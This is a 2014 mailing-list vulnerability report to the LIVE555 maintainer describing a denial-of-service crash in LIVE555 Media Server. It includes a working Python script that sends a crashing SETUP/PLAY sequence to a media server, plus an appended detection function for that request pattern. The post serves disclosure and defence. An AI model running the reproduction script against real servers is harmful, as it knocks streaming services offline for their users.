[Live-devel] DoS in Media Server
Yann FLEUTOT
yann.fleutot at stormshield.eu
Wed Jul 16 01:11:35 PDT 2014
Ok, here are the details:

DESCRIPTION
An RTSP client can make the LIVE555 Media Server crash by renegotiating transport parameters.

PRODUCTS IMPACTED
LIVE555 Media Server ( http://www.live555.com/mediaServer/ ).
At minimum v0.74 (2011.12.23) to the most recent version to date v0.82 (2014.03.16).

TECHNICAL DETAILS
The following sequence of requests causes the DoS:
1. DESCRIBE (optionally)
2. SETUP (e.g. audio track)
3. SETUP (e.g. video track)
4. PLAY
5. SETUP (any of the previously opened tracks)
6. PLAY
Adding a PAUSE request between steps 4 and 5 works around the problem. However, RFC 2326 (RTSP) specifies in chapter “A.2 Server State Machine” that a SETUP request can actually be issued in the “Playing” state.
The following Python script reproduces the vulnerability.

import socket
import re

host = ("172.17.44.20", 554)
url = "rtsp://172.17.44.20/brasilccmovie.mpg"

def send(msg):
    if (send.session != ''):
        msg += "Session: " + send.session + "\r\n"
    msg += "CSeq: " + str(send.cseq) + "\r\n"
    msg += "\r\n"
    s.send(msg)
    send.cseq += 1
    reply = s.recv(1000)
    match = re.search('Session: ([^\r;]*)', reply, re.DOTALL)
    if (match):
        send.session = match.group(1)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(0.5)
s.connect(host)
send.session = ''
send.cseq = 1
#send("DESCRIBE " + url + " RTSP/1.0\r\nAccept: application/sdp\r\n")
send("SETUP " + url + "/track1 RTSP/1.0\r\nTransport: RTP/AVP/UDP;unicast;client_port=34000-34001\r\n")
send("SETUP " + url + "/track2 RTSP/1.0\r\nTransport: RTP/AVP/UDP;unicast;client_port=34002-34003\r\n")
send("PLAY " + url + " RTSP/1.0\r\n")
#send("PAUSE " + url + " RTSP/1.0\r\n")
send("SETUP " + url + "/track1 RTSP/1.0\r\nTransport: RTP/AVP/UDP;unicast;client_port=35000-35001\r\n")
send("PLAY " + url + " RTSP/1.0\r\n")
s.close()

From: “Ross Finlayson” finlayson at live555.com
To: “LIVE555 Streaming Media - development & use” live-devel at ns.live555.com
Sent: Tuesday 15 July 2014 19:58:34
Subject: Re: [Live-devel] DoS in Media Server
Please post the details here. If the issue is significant, then we’ll update the code, and people will be encouraged to upgrade.
Ross Finlayson
Live Networks, Inc.
http://www.live555.com/
--
Yann Fleutot
Stormshield Network Security developer
Arkoon Netasq
49 rue Billancourt - FR 92100 Boulogne-Billancourt
Twitter - LinkedIn - www.stormshield.eu
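
Added example, not part of the original post and not LIVE555 code: a detection check for the request pattern reported above, flagging a SETUP that re-opens an already set-up track while the session is playing with no PAUSE in between. It assumes all requests belong to one RTSP session on one connection; the function names and the sample traffic are constructed for illustration.

```python
import re

REQUEST_LINE = re.compile(r"^([A-Z_]+) (\S+) RTSP/1\.0$")

def parse_request(raw):
    """Split one RTSP request into (method, url, headers); None if malformed."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    match = REQUEST_LINE.match(lines[0])
    if not match:
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return match.group(1), match.group(2), headers

def find_setup_while_playing(requests):
    """Return (CSeq, url) for each SETUP that re-opens a track during playback.

    Assumption: all requests belong to one RTSP session on one connection.
    """
    playing, tracks, alerts = False, set(), []
    for raw in requests:
        parsed = parse_request(raw)
        if parsed is None:
            continue
        method, url, headers = parsed
        if method == "SETUP":
            if playing and url in tracks:
                alerts.append((headers.get("cseq"), url))
            tracks.add(url)
        elif method == "PLAY" and tracks:
            playing = True
        elif method == "PAUSE":
            playing = False
        elif method == "TEARDOWN":
            playing, tracks = False, set()
    return alerts

def req(method, url, cseq):
    """Build one constructed RTSP request string for the sample traffic."""
    return "%s %s RTSP/1.0\r\nCSeq: %d\r\n\r\n" % (method, url, cseq)

# Constructed sample traffic (192.0.2.10 is a documentation address).
BASE = "rtsp://192.0.2.10/sample.mpg"
NO_PAUSE = [req("SETUP", BASE + "/track1", 1), req("SETUP", BASE + "/track2", 2),
            req("PLAY", BASE, 3), req("SETUP", BASE + "/track1", 4),
            req("PLAY", BASE, 5)]
WITH_PAUSE = NO_PAUSE[:3] + [req("PAUSE", BASE, 4),
                             req("SETUP", BASE + "/track1", 5), req("PLAY", BASE, 6)]
```

Because RFC 2326 allows SETUP in the Playing state, a hit is a signal to correlate with server crashes or restarts rather than proof of abuse.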